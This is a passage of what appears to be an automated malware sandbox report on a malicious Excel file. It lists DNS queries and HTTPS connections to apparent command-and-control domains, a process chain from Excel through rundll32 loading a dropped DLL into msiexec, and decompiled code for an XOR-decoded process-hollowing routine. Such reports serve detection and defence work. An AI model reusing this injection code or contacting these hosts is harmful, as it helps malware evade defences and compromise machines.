                                                              Jan 26, 2021 21:35:37.607513905 CET49168443192.168.2.22104.21.73.69
                                                              Jan 26, 2021 21:35:37.623816967 CET49168443192.168.2.22104.21.73.69
                                                              Jan 26, 2021 21:35:37.644897938 CET44349168104.21.73.69192.168.2.22
                                                              Jan 26, 2021 21:35:37.645494938 CET44349168104.21.73.69192.168.2.22
                                                              Jan 26, 2021 21:35:37.645565987 CET49168443192.168.2.22104.21.73.69
                                                              Jan 26, 2021 21:35:37.664165020 CET49168443192.168.2.22104.21.73.69
                                                              Jan 26, 2021 21:35:37.685534954 CET44349168104.21.73.69192.168.2.22
                                                              Jan 26, 2021 21:35:38.123249054 CET44349168104.21.73.69192.168.2.22
                                                              Jan 26, 2021 21:35:38.123363018 CET49168443192.168.2.22104.21.73.69
                                                              Jan 26, 2021 21:35:38.123390913 CET44349168104.21.73.69192.168.2.22
                                                              Jan 26, 2021 21:35:38.123522043 CET49168443192.168.2.22104.21.73.69
                                                              Jan 26, 2021 21:35:38.127394915 CET49168443192.168.2.22104.21.73.69
                                                              Jan 26, 2021 21:35:38.148705959 CET44349168104.21.73.69192.168.2.22
                                                              Jan 26, 2021 21:37:02.974628925 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:37:02.996259928 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:37:02.999912024 CET49165443192.168.2.22172.67.150.228

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 26, 2021 21:35:03.059026003 CET5219753192.168.2.228.8.8.8
                                                              Jan 26, 2021 21:35:03.075212002 CET53521978.8.8.8192.168.2.22
                                                              Jan 26, 2021 21:35:35.910082102 CET5309953192.168.2.228.8.8.8
                                                              Jan 26, 2021 21:35:35.927476883 CET53530998.8.8.8192.168.2.22
                                                              Jan 26, 2021 21:35:36.971981049 CET5283853192.168.2.228.8.8.8
                                                              Jan 26, 2021 21:35:36.989037991 CET53528388.8.8.8192.168.2.22
                                                              Jan 26, 2021 21:35:37.533046961 CET6120053192.168.2.228.8.8.8
                                                              Jan 26, 2021 21:35:37.549777031 CET53612008.8.8.8192.168.2.22

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Jan 26, 2021 21:35:03.059026003 CET192.168.2.228.8.8.80x312aStandard query (0)rnollg.comA (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:35.910082102 CET192.168.2.228.8.8.80x6026Standard query (0)gadgetswolf.comA (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:36.971981049 CET192.168.2.228.8.8.80xe172Standard query (0)homesoapmolds.comA (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:37.533046961 CET192.168.2.228.8.8.80x70beStandard query (0)govemedico.tkA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Jan 26, 2021 21:35:03.075212002 CET8.8.8.8192.168.2.220x312aNo error (0)rnollg.com172.67.150.228A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:03.075212002 CET8.8.8.8192.168.2.220x312aNo error (0)rnollg.com104.21.11.254A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:35.927476883 CET8.8.8.8192.168.2.220x6026No error (0)gadgetswolf.com172.67.200.147A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:35.927476883 CET8.8.8.8192.168.2.220x6026No error (0)gadgetswolf.com104.21.44.135A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:36.989037991 CET8.8.8.8192.168.2.220xe172No error (0)homesoapmolds.com104.21.60.169A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:36.989037991 CET8.8.8.8192.168.2.220xe172No error (0)homesoapmolds.com172.67.198.109A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:37.549777031 CET8.8.8.8192.168.2.220x70beNo error (0)govemedico.tk104.21.73.69A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:37.549777031 CET8.8.8.8192.168.2.220x70beNo error (0)govemedico.tk172.67.158.184A (IP address)IN (0x0001)

                                                              HTTPS Packets

                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                              Jan 26, 2021 21:35:03.154751062 CET172.67.150.228443192.168.2.2249165CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                              Jan 26, 2021 21:35:36.030499935 CET172.67.200.147443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                              Jan 26, 2021 21:35:37.038079977 CET104.21.60.169443192.168.2.2249167CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                              Jan 26, 2021 21:35:37.604994059 CET104.21.73.69443192.168.2.2249168CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Jan 14 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Fri Jan 14 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                              Code Manipulations

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Start time:21:34:38
                                                              Start date:26/01/2021
                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                              Imagebase:0x13fb80000
                                                              File size:27641504 bytes
                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:21:34:43
                                                              Start date:26/01/2021
                                                              Path:C:\Windows\System32\rundll32.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                                                              Imagebase:0xffc80000
                                                              File size:45568 bytes
                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              General

                                                              Start time:21:34:44
                                                              Start date:26/01/2021
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                                                              Imagebase:0x6a0000
                                                              File size:44544 bytes
                                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              General

                                                              Start time:21:35:12
                                                              Start date:26/01/2021
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:msiexec.exe
                                                              Imagebase:0x2a0000
                                                              File size:73216 bytes
                                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >

                                                                Executed Functions

                                                                C-Code - Quality: 89%
                                                                			E0034AE40(void* __eflags) {
                                                                				void* _v20;
                                                                				void* _v24;
                                                                				long _v28;
                                                                				intOrPtr _v32;
                                                                				long _v36;
                                                                				signed int _v40;
                                                                				signed int _v44;
                                                                				signed int _v48;
                                                                				signed int _v52;
                                                                				struct _PROCESS_INFORMATION _v68;
                                                                				void* _v72;
                                                                				intOrPtr _v110;
                                                                				char _v111;
                                                                				char _v125;
                                                                				signed int _v129;
                                                                				char _v130;
                                                                				void* _v134;
                                                                				char _v135;
                                                                				intOrPtr _v139;
                                                                				void _v140;
                                                                				char _v155;
                                                                				char _v179;
                                                                				void* _v712;
                                                                				char _v896;
                                                                				char _v1416;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* _t76;
                                                                				intOrPtr* _t89;
                                                                				intOrPtr _t91;
                                                                				void* _t94;
                                                                				int _t97;
                                                                				void* _t100;
                                                                				void* _t104;
                                                                				signed int _t107;
                                                                				int _t109;
                                                                				void* _t111;
                                                                				void _t112;
                                                                				void* _t119;
                                                                				int _t121;
                                                                				intOrPtr* _t123;
                                                                				int _t126;
                                                                				long _t128;
                                                                				int _t129;
                                                                				int _t136;
                                                                				void* _t137;
                                                                				signed int _t139;
                                                                				signed int _t148;
                                                                				void* _t150;
                                                                				struct _STARTUPINFOA* _t151;
                                                                				long _t152;
                                                                				void* _t153;
                                                                				CONTEXT* _t155;
                                                                				signed int _t157;
                                                                				void* _t159;
                                                                				signed int _t172;
                                                                				void* _t177;
                                                                				CHAR* _t178;
                                                                				long _t180;
                                                                				intOrPtr _t182;
                                                                				void* _t184;
                                                                				signed int _t185;
                                                                				void* _t196;
                                                                				void* _t207;
                                                                				signed int _t241;
                                                                
                                                                				_t226 = __eflags;
                                                                				E003445B0(_t76, _t159, _t177, __eflags); // executed
                                                                				E00346C20(_t159, _t177, __eflags);
                                                                				E00346530(_t159, _t177, _t226);
                                                                				E00348660(_t159, _t177, _t226);
                                                                				E003478D0(_t159, _t177, _t226);
                                                                				E003466E0(_t159, _t177, _t226);
                                                                				_t188 = 0xffffffff;
                                                                				if(E0034D670() == 0) {
                                                                					return 0xffffffff;
                                                                				}
                                                                				E0035B180();
                                                                				_t228 =  *0x3637b0;
                                                                				if( *0x3637b0 == 0) {
                                                                					L19:
                                                                					E0034BF50(_t243, 0, E00349D50(0x638d6cbf));
                                                                					ExitProcess(0);
                                                                				}
                                                                				_t89 = E0034BF50(_t228, 0, E00349D50(0x6bae8bdb));
                                                                				_t196 = _t196 + 0xc;
                                                                				_t188 =  &_v1416;
                                                                				 *_t89( *0x3637b0,  &_v1416, 0x104);
                                                                				_t91 =  *0x3637b0; // 0x340000
                                                                				_t229 = _t91;
                                                                				_v32 = _t91;
                                                                				if(_t91 == 0) {
                                                                					goto L19;
                                                                				}
                                                                				_t151 =  &_v140;
                                                                				E00358F20(_t151, 0x44);
                                                                				_v140 = 0x44;
                                                                				_t94 = E0034D0A0( &_v179, 0x360b1b,  &_v179);
                                                                				_t178 =  &_v896;
                                                                				E0034C560(_t178, _t94, 0xffffffff);
                                                                				E0034BF50(_t229, 0, 0x1e16041);
                                                                				_t196 = _t196 + 0x24;
                                                                				_t97 = CreateProcessA(0, _t178, 0, 0, 0, 4, 0, 0, _t151,  &_v68); // executed
                                                                				_t230 = _t97 - 1;
                                                                				if(_t97 != 1) {
                                                                					goto L19;
                                                                				}
                                                                				_t152 = E0034A820(_v32);
                                                                				E0034BF50(_t230, 0, 0x8cae838);
                                                                				_t196 = _t196 + 0xc;
                                                                				_t100 = VirtualAllocEx(_v68.hProcess, 0, _t152, 0x3000, 4); // executed
                                                                				_t231 = _t100;
                                                                				if(_t100 == 0) {
                                                                					goto L19;
                                                                				}
                                                                				 *0x362ca8 = _t100;
                                                                				_v24 = _t100;
                                                                				E0035FA60(_t178, _t231,  &_v1416);
                                                                				E003590E0(_t178);
                                                                				E0035FB20(_t178);
                                                                				_t104 = E00349D80(_v32, _t152); // executed
                                                                				_t188 = _t104;
                                                                				E00354660(_t104, _v32);
                                                                				E00349550(_t152, _t177, _v32, _t231, _t188, _v24);
                                                                				_t207 = _t196 + 0x1c;
                                                                				_t107 = E003576C0(_t231);
                                                                				_t180 = _t152;
                                                                				_v48 = _t107;
                                                                				if(_t152 == 0) {
                                                                					L8:
                                                                					_v28 = 0;
                                                                					E0034BF50(_t234, 0, 0xa48b0f9);
                                                                					_t196 = _t207 + 8;
                                                                					_t109 = WriteProcessMemory(_v68.hProcess, _v24, _t188, _t180,  &_v28); // executed
                                                                					_t235 = _t109 - 1;
                                                                					if(_t109 == 1) {
                                                                						_t188 = _t180;
                                                                						E0034BF50(_t235, 0, 0x8cae838);
                                                                						_t196 = _t196 + 8;
                                                                						_t111 = VirtualAllocEx(_v68.hProcess, 0, 0x42, 0x3000, 4); // executed
                                                                						_t236 = _t111;
                                                                						if(_t111 != 0) {
                                                                							_t112 = E00347DD0(0x12);
                                                                							_t153 = _v24;
                                                                							_v140 = _t112;
                                                                							_v20 = _t111;
                                                                							_v139 = _t153;
                                                                							_v135 = E00347DD0(0x15);
                                                                							_v134 = _t188;
                                                                							_v130 = 0xb8;
                                                                							_v129 = _v48;
                                                                							E0034E930( &_v125, E0035D7E0( &_v28, _t177, 0x360962, 0xf,  &_v155), 0xe);
                                                                							_t182 = _v32;
                                                                							_v111 = 0xe9;
                                                                							E003422E0(_t236, E0034CA4E, _t182);
                                                                							_t119 = E00349D50(0x2e6222c1);
                                                                							_t184 = _v20;
                                                                							_v110 = 0xb61ea7e1 - _t182 + _t153 - _t184 + _t119;
                                                                							E0034BF50(_t236, 0, 0xa48b0f9);
                                                                							_t196 = _t196 + 0x34;
                                                                							_t121 = WriteProcessMemory(_v68.hProcess, _t184,  &_v140, 0x42,  &_v28); // executed
                                                                							_t237 = _t121 - 1;
                                                                							if(_t121 == 1) {
                                                                								_v36 = _t188;
                                                                								_t155 =  &_v896;
                                                                								E00358F20(_t155, 0x2cc);
                                                                								_v896 = 0x10001;
                                                                								_t123 = E0034BF50(_t237, 0, 0x4bbc7e4);
                                                                								_t188 =  *_t123(_v68.hThread, _t155);
                                                                								E0034BF50(_t237, 0, 0xd1a4de8);
                                                                								_t196 = _t196 + 0x18;
                                                                								_t126 = VirtualProtectEx(_v68.hProcess, _t184, 0x42, 0x10,  &_v28); // executed
                                                                								if(_t126 == 1) {
                                                                									_t239 = _t188 - 1;
                                                                									_t172 = 1;
                                                                									_v712 = _t184;
                                                                									if(_t188 == 1) {
                                                                										E0034BF50(_t239, 0, E00349D50(0x60ce8748));
                                                                										_t196 = _t196 + 0xc;
                                                                										_t136 = SetThreadContext(_v68.hThread, _t155); // executed
                                                                										_t68 = _t136 != 1;
                                                                										_t241 = _t68;
                                                                										_t172 = 0 | _t68;
                                                                									}
                                                                									_t185 = _t172;
                                                                									_t188 = E0034BF50(_t241, 0, 0xd1a4de8);
                                                                									_t128 = E00349D50(0x647400ec);
                                                                									_t196 = _t196 + 0xc;
                                                                									_t129 = VirtualProtectEx(_v68.hProcess, _v24, _v36, _t128,  &_v28); // executed
                                                                									if(_t129 == 1) {
                                                                										_t243 = _t185;
                                                                										if(_t185 == 0) {
                                                                											E0034BF50(__eflags, 0, E00349D50(0x6f5727e8));
                                                                											_t196 = _t196 + 0xc;
                                                                											_push(_v68.hThread);
                                                                										} else {
                                                                											E0034BF50(_t243, 0, 0x68b1574);
                                                                											_t196 = _t196 + 8;
                                                                											_push(0);
                                                                											_push(0);
                                                                											_push(0);
                                                                											_push(_v20);
                                                                											_push(0);
                                                                											_push(0);
                                                                											_push(_v68);
                                                                										}
                                                                										ResumeThread(); // executed
                                                                									}
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                					goto L19;
                                                                				} else {
                                                                					_t157 = _v48;
                                                                					_t137 = 0;
                                                                					_v36 = _t180;
                                                                					_v72 = _t188;
                                                                					do {
                                                                						_v20 = _t137;
                                                                						 *(_t188 + _t137) =  *(_t188 + _t137) ^ _t157;
                                                                						_t139 = _t157 << 8;
                                                                						_v52 = _t139;
                                                                						_v44 =  !_t139;
                                                                						_v40 = E00343750(0,  !_t139, 0x9b6b004f);
                                                                						_v40 = E00342DC0(0, E00349D50(0xff1f00e3) &  !(_t157 >> 0x18), _t157 >> 0x00000018 & 0xffffffb0) ^ (_v52 & 0x6494ff00 | _v40);
                                                                						_t180 = _v36;
                                                                						_v44 = E003420A0(0, E00342DC0(0, _v44,  !(_t157 >> 0x18)), 0xffffffff);
                                                                						_t148 = E00349D50(0xff1f00e3);
                                                                						E00342DC0(0, _v52, _t157 >> 0x18);
                                                                						_t150 = E003422E0(0, 0, 1);
                                                                						_t207 = _t207 + 0x38;
                                                                						_v20 = _v20 - _t150;
                                                                						_t157 = (_t148 | 0x6494ffb0) & _v44 | _v40;
                                                                						_t188 = _v72;
                                                                						_t137 = _v20;
                                                                						_t234 = _t137 - _t180;
                                                                					} while (_t137 != _t180);
                                                                					goto L8;
                                                                				}
                                                                			}




































































                                                                0x0034ae40
                                                                0x0034ae4c
                                                                0x0034ae51
                                                                0x0034ae56
                                                                0x0034ae5b
                                                                0x0034ae60
                                                                0x0034ae65
                                                                0x0034ae6a
                                                                0x0034ae76
                                                                0x0034b2de
                                                                0x0034b2de
                                                                0x0034ae7c
                                                                0x0034ae81
                                                                0x0034ae88
                                                                0x0034b2b4
                                                                0x0034b2c4
                                                                0x0034b2ce
                                                                0x0034b2ce
                                                                0x0034ae9e
                                                                0x0034aea3
                                                                0x0034aea6
                                                                0x0034aeb8
                                                                0x0034aeba
                                                                0x0034aebf
                                                                0x0034aec1
                                                                0x0034aec4
                                                                0x00000000
                                                                0x00000000
                                                                0x0034aeca
                                                                0x0034aed3
                                                                0x0034aee1
                                                                0x0034aef1
                                                                0x0034aef9
                                                                0x0034af03
                                                                0x0034af12
                                                                0x0034af17
                                                                0x0034af2e
                                                                0x0034af30
                                                                0x0034af33
                                                                0x00000000
                                                                0x00000000
                                                                0x0034af44
                                                                0x0034af4d
                                                                0x0034af52
                                                                0x0034af62
                                                                0x0034af64
                                                                0x0034af66
                                                                0x00000000
                                                                0x00000000
                                                                0x0034af6c
                                                                0x0034af74
                                                                0x0034af77
                                                                0x0034af7d
                                                                0x0034af87
                                                                0x0034af91
                                                                0x0034af99
                                                                0x0034af9d
                                                                0x0034afa9
                                                                0x0034afae
                                                                0x0034afb1
                                                                0x0034afb8
                                                                0x0034afba
                                                                0x0034afbd
                                                                0x0034b08d
                                                                0x0034b08d
                                                                0x0034b09b
                                                                0x0034b0a0
                                                                0x0034b0af
                                                                0x0034b0b1
                                                                0x0034b0b4
                                                                0x0034b0ba
                                                                0x0034b0c3
                                                                0x0034b0c8
                                                                0x0034b0d9
                                                                0x0034b0db
                                                                0x0034b0dd
                                                                0x0034b0e7
                                                                0x0034b0ef
                                                                0x0034b0f2
                                                                0x0034b0f8
                                                                0x0034b0fb
                                                                0x0034b10b
                                                                0x0034b114
                                                                0x0034b11a
                                                                0x0034b11e
                                                                0x0034b13e
                                                                0x0034b146
                                                                0x0034b149
                                                                0x0034b153
                                                                0x0034b160
                                                                0x0034b176
                                                                0x0034b17d
                                                                0x0034b187
                                                                0x0034b18c
                                                                0x0034b19d
                                                                0x0034b19f
                                                                0x0034b1a2
                                                                0x0034b1a8
                                                                0x0034b1b0
                                                                0x0034b1b7
                                                                0x0034b1bf
                                                                0x0034b1d0
                                                                0x0034b1de
                                                                0x0034b1e7
                                                                0x0034b1ec
                                                                0x0034b1fb
                                                                0x0034b200
                                                                0x0034b206
                                                                0x0034b209
                                                                0x0034b20e
                                                                0x0034b214
                                                                0x0034b226
                                                                0x0034b22b
                                                                0x0034b232
                                                                0x0034b239
                                                                0x0034b239
                                                                0x0034b239
                                                                0x0034b239
                                                                0x0034b23c
                                                                0x0034b250
                                                                0x0034b257
                                                                0x0034b25c
                                                                0x0034b26b
                                                                0x0034b270
                                                                0x0034b272
                                                                0x0034b274
                                                                0x0034b2a7
                                                                0x0034b2ac
                                                                0x0034b2af
                                                                0x0034b276
                                                                0x0034b27d
                                                                0x0034b282
                                                                0x0034b285
                                                                0x0034b287
                                                                0x0034b289
                                                                0x0034b28b
                                                                0x0034b28e
                                                                0x0034b290
                                                                0x0034b292
                                                                0x0034b292
                                                                0x0034b2b2
                                                                0x0034b2b2
                                                                0x0034b270
                                                                0x0034b200
                                                                0x0034b1a2
                                                                0x0034b0dd
                                                                0x00000000
                                                                0x0034afc3
                                                                0x0034afc3
                                                                0x0034afc6
                                                                0x0034afc8
                                                                0x0034afcb
                                                                0x0034afd0
                                                                0x0034afd0
                                                                0x0034afd3
                                                                0x0034afdd
                                                                0x0034afe0
                                                                0x0034afe7
                                                                0x0034affb
                                                                0x0034b027
                                                                0x0034b02b
                                                                0x0034b044
                                                                0x0034b04c
                                                                0x0034b066
                                                                0x0034b072
                                                                0x0034b077
                                                                0x0034b07a
                                                                0x0034b07d
                                                                0x0034b07f
                                                                0x0034b082
                                                                0x0034b085
                                                                0x0034b085
                                                                0x00000000
                                                                0x0034afd0

                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000004), ref: 0034AF62
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0034B0AF
                                                                • VirtualAllocEx.KERNELBASE(?,00000000,00000042,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 0034B0D9
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000044,00000042,00000000), ref: 0034B19D
                                                                • VirtualProtectEx.KERNELBASE(?,?,00000042,00000010,00000000), ref: 0034B1FB
                                                                • SetThreadContext.KERNEL32(?,?), ref: 0034B232
                                                                • VirtualProtectEx.KERNELBASE(?,?,?,00000000,00000000), ref: 0034B26B
                                                                • ResumeThread.KERNELBASE(?), ref: 0034B2B2
                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0034AF2E
                                                                  • Part of subcall function 0034BF50: LoadLibraryA.KERNEL32(?), ref: 0034C1A1
                                                                • ExitProcess.KERNEL32(00000000), ref: 0034B2CE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ProcessVirtual$AllocMemoryProtectThreadWrite$ContextCreateExitLibraryLoadResume
                                                                • String ID: D
                                                                • API String ID: 2854380510-2746444292
                                                                • Opcode ID: e1db84ac316f688db3087b384e69846828c9f34a11fb42a1d4ca11eb3b03e9b7
                                                                • Instruction ID: 8a7d8b8ced7fda62ab9af2d4bd77501e98b843b1c57fd381769036459f5adafb
                                                                • Opcode Fuzzy Hash: e1db84ac316f688db3087b384e69846828c9f34a11fb42a1d4ca11eb3b03e9b7
                                                                • Instruction Fuzzy Hash: 24C1DCB1D402146BDF12AFB49C43FAEB6B49F55715F150024F918BE292EAA17E048BB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,00000920,00003000,00000040,00000920,00420780), ref: 00420DE5
                                                                • VirtualAlloc.KERNEL32(00000000,000005EB,00003000,00000040,004207E1), ref: 00420E1C
                                                                • VirtualAlloc.KERNEL32(00000000,00022439,00003000,00000040), ref: 00420E7C
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00420EB2
                                                                • VirtualProtect.KERNEL32(00340000,00000000,00000004,00420D07), ref: 00420FB7
                                                                • VirtualProtect.KERNEL32(00340000,00001000,00000004,00420D07), ref: 00420FDE
                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,00420D07), ref: 004210AB
                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,00420D07,?), ref: 00421101
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0042111D
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154811947.0000000000420000.00000040.00020000.sdmp, Offset: 00420000, based on PE: false
                                                                Similarity
                                                                • API ID: Virtual$Protect$Alloc$Free
                                                                • String ID:
                                                                • API String ID: 2574235972-0
                                                                • Opcode ID: 046c22bfd6cc6457a861a1a9c923bc078a3a1c54b33ff9aed95f43ed8304fc38
                                                                • Instruction ID: f83d684d08419a179c41bd11a1a179c783482fe92862c18a028811daeefd3e0a
                                                                • Opcode Fuzzy Hash: 046c22bfd6cc6457a861a1a9c923bc078a3a1c54b33ff9aed95f43ed8304fc38
                                                                • Instruction Fuzzy Hash: 11D18D722002409FEB15CF44C881B6A77AAFFD8310B694199ED899F35FDB74B850CB66
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0035DA20() {
                                                                				char _v28;
                                                                				void* _t4;
                                                                
                                                                				_t4 = CreateEventW(0, 1, 0, E00347200(0x3605f8,  &_v28));
                                                                				if(_t4 != 0) {
                                                                					SetEvent(_t4);
                                                                					_t4 = CloseHandle(_t4); // executed
                                                                				}
                                                                				SetLastError(0);
                                                                				return _t4;
                                                                			}





                                                                0x0035da3f
                                                                0x0035da47
                                                                0x0035da4c
                                                                0x0035da53
                                                                0x0035da53
                                                                0x0035da5b
                                                                0x0035da66

                                                                APIs
                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-00361D33,?,003491EB,-00361D33,?,003477A1,00000001), ref: 0035DA3F
                                                                • SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-00361D33,?,003491EB,-00361D33,?,003477A1,00000001,?,-00361D33,?,00346A74), ref: 0035DA4C
                                                                • CloseHandle.KERNEL32(00000000), ref: 0035DA53
                                                                • SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-00361D33,?,003491EB,-00361D33,?,003477A1,00000001,?,-00361D33,?,00346A74), ref: 0035DA5B
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Event$CloseCreateErrorHandleLast
                                                                • String ID:
                                                                • API String ID: 2055590504-0
                                                                • Opcode ID: f192404d8f067382abebc66c544d2dd49c7ec5fffb51820aa044dc86159ef498
